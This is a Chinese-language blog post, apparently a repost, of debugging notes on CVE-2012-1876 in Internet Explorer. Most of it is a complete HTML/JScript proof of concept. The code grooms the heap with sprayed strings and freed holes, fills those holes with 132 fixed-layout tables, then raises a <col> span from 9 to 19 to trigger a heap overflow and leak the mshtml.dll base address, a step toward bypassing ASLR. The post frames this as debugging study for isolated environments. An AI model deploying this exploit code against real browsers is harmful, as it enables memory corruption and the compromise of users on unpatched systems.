CVE-2012-1876调试要点
調試要點：
1. 當 WinDbg 的 .childdbg 1（自動調試被調試進程派生的子進程）命令無效時，可直接把 poc.html 拖入 IE，中間會因 IE 加載 ActiveX 控件而暫停，此時再 Attach 到對應的 IE 進程。
2. 進行真實的 exp 調試時，需關閉頁堆（gflags 的 hpa），使程序的堆管理在正常情況下進行：本 PoC 依賴正常堆分配器把新分配落回之前釋放出來的間隙，開啟頁堆後每個分配都被單獨隔離，佈局就不成立了。此 PoC 只在未打補丁的 IE 上觸發，僅應在隔離的調試環境中運行。
3. 此 PoC 的思想是：先通過 JS 分配堆內存，然後再釋放一部分，使已分配的堆塊之間直接產生空閒的間隙堆塊；之後解析 <table> 的時候，會分配 0x1C*max(span,4) 大小的堆塊，PoC 中設置 span=9，是因為 0x1C*9=0xFC<0x100，剛好使之前釋放的間隙堆塊再次被分配出來；最後由 JS 把 <col> 的 span 設為 19，來造成溢出（0x1C*19=0x214 位元組寫入只有 0xFC 位元組的緩衝區）。
所以總結起來堆塊的操作順序就是：JS 代碼不斷分配/釋放，構成空閒間隙堆塊佈局 -> 解析 <table> 中 <col> 的 span 屬性，把空閒間隙堆塊分配出來 -> JS 代碼修改 span 屬性造成堆複製溢出。根據 HTML 從上到下的解析順序得到 POC 代碼如下：
<html>
<body>
<div id="evil"></div>
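<script language='javascript'>
// Stage 1: heap grooming. This is IE-era JScript (ES3): var only, no let/const.
// Every BSTR built below holds (0x100 - 6) / 2 == 125 UTF-16 code units, i.e.
// 4-byte length prefix + 250 bytes of data + 2-byte terminator = 0x100 bytes,
// so each one is served from the same 0x100 heap bucket that the
// <table><col span="9"> layout buffer (0x1C * 9 = 0xFC bytes, per the article)
// will be carved from in stage 2. NOTE(review): this only works with the normal
// heap -- page heap (gflags /hpa) isolates every allocation and breaks the layout.
var leak_index = -1;

// Three recognisable fill patterns so chunks can be told apart in a dump:
// E = the strings that get freed (holes), A = the strings whose length is
// later checked for corruption, B = filler between an A string and a button.
var dap = "EEEE";
while (dap.length < 480) dap += dap;
var padding = "AAAA";
while (padding.length < 480) padding += padding;
var filler = "BBBB";
while (filler.length < 480) filler += filler;

var arr = new Array();   // kept alive: stage 3 reads arr[i].length
var rra = new Array();   // freed below to punch holes into the layout
var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";

// 1. Lay out the heap as a repeating E, A, B, <button> pattern (250 rounds).
for (var i = 0; i < 500; i += 2) {
  // E
  rra[i] = dap.substring(0, (0x100 - 6) / 2);
  // S, bstr = A
  arr[i] = padding.substring(0, (0x100 - 6) / 2);
  // A, bstr = B
  arr[i + 1] = filler.substring(0, (0x100 - 6) / 2);
  // B -- the button's layout object is what stage 3 expects to find right
  // after an overflowed string (its vtable pointer is the leak; see the article).
  var obj = document.createElement("button");
  div_container.appendChild(obj);
}

// Free every E string in the upper half so each released 0x100-byte chunk
// becomes a hole between live A/B strings. CollectGarbage() is IE-specific
// (JScript); it is called per iteration so the BSTRs are actually released
// before the <table> elements below are parsed.
for (var i = 200; i < 500; i += 2) {
  rra[i] = null;
  CollectGarbage();
}
</script>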
<!-- 2. Occupy the freed gap chunks (stage 2). The line-comment syntax used in the
     original is plain text to the HTML parser; an HTML comment is used instead. -->
<!-- Stage 2: occupy the holes. According to the article, parsing a <col span="9">
     in a fixed-layout table makes mshtml allocate 0x1C * 9 = 0xFC bytes, which the
     heap serves from the 0x100 bucket the preceding script just freed into, so
     these layout buffers are expected to land in the E holes between live A/B
     strings. Only the last one (id="132", in the line after this run) has its
     span changed later; the others presumably just raise the odds that it lands
     in a hole -- confirm in the debugger. width="41" and table-layout:fixed are
     taken from the original PoC as-is. -->
<table style="table-layout:fixed" ><col id="1" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="2" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="3" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="4" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="5" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="6" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="7" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="8" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="9" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="10" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="11" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="12" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="13" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="14" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="15" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="16" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="17" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="18" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="19" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="20" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="21" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="22" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="23" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="24" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="25" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="26" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="27" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="28" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="29" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="30" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="31" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="32" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="33" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="34" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="35" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="36" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="37" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="38" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="39" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="40" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="41" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="42" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="43" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="44" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="45" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="46" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="47" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="48" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="49" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="50" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="51" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="52" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="53" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="54" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="55" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="56" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="57" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="58" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="59" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="60" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="61" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="62" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="63" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="64" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="65" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="66" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="67" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="68" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="69" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="70" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="71" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="72" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="73" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="74" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="75" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="76" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="77" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="78" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="79" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="80" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="81" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="82" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="83" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="84" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="85" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="86" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="87" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="88" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="89" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="90" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="91" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="92" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="93" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="94" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="95" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="96" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="97" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="98" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="99" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="100" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="101" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="102" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="103" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="104" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="105" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="106" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="107" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="108" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="109" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="110" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="111" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="112" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="113" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="114" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="115" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="116" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="117" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="118" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="119" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="120" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="121" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="122" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="123" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="124" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="125" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="126" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="127" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="128" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="129" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="130" width="41" span="9" > </col></table>
<table style="table-layout:fixed" ><col id="131" width="41" span="9" > </col></table>
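<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>
<script language='javascript'>
// Stage 3: trigger the overflow and turn it into an mshtml.dll base-address leak.
// Raising span from 9 to 19 makes the table layout code copy 0x1C * 19 = 0x214
// bytes into a buffer that was sized for 0x1C * 9 = 0xFC (the article's account
// of CVE-2012-1876); the excess runs into whatever chunks follow the buffer in
// the stage-1 layout. IE-era JScript: var only.
var evil_col = document.getElementById("132");
evil_col.span = "19";
alert("after over flow");

var leak_addr = -1;
for (var i = 0; i < 500; i++) {
  // An A/B string now reporting more than the 125 code units it was created
  // with has been hit by the overflow (presumably its BSTR length prefix was
  // clobbered). Reading past its original end reaches the next chunk -- the
  // <button>'s layout object per the article (it names the class CButtonLayout)
  // -- whose first field is its vtable pointer. Vtables live in mshtml's .rdata
  // at a fixed offset from the module base, so vtable - offset = mshtml base.
  if (arr[i].length > (0x100 - 6) / 2) {
    leak_index = i;
    // Two UTF-16 code units (4 bytes) starting 2 + 8 bytes past the original
    // string end; presumably the 2-byte terminator plus an 8-byte heap chunk
    // header -- TODO confirm against the heap layout in the debugger.
    var leak = arr[i].substring((0x100 - 6) / 2 + (2 + 8) / 2, (0x100 - 6) / 2 + (2 + 8 + 4) / 2);
    // Little-endian 32-bit pointer: code unit 1 is the high word, 0 the low.
    // Assemble it arithmetically. The original concatenated the two
    // toString(16) results, which drops leading zero nibbles of the low word
    // (e.g. low word 0x0058 -> "58") and so mis-decodes ~1 in 16 pointers.
    leak_addr = leak.charCodeAt(1) * 0x10000 + leak.charCodeAt(0);
    alert(leak_addr.toString(16));
    // 0x001584f8 is the vtable RVA in the article author's mshtml.dll build;
    // it differs per mshtml version and must be re-derived for any other build.
    leak_addr = leak_addr - Number(0x001584f8);
    alert(leak_addr.toString(16));
    break;
  }
}
</script>
</body>
</html>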
轉載于:https://my.oschina.net/u/3281747/blog/1922878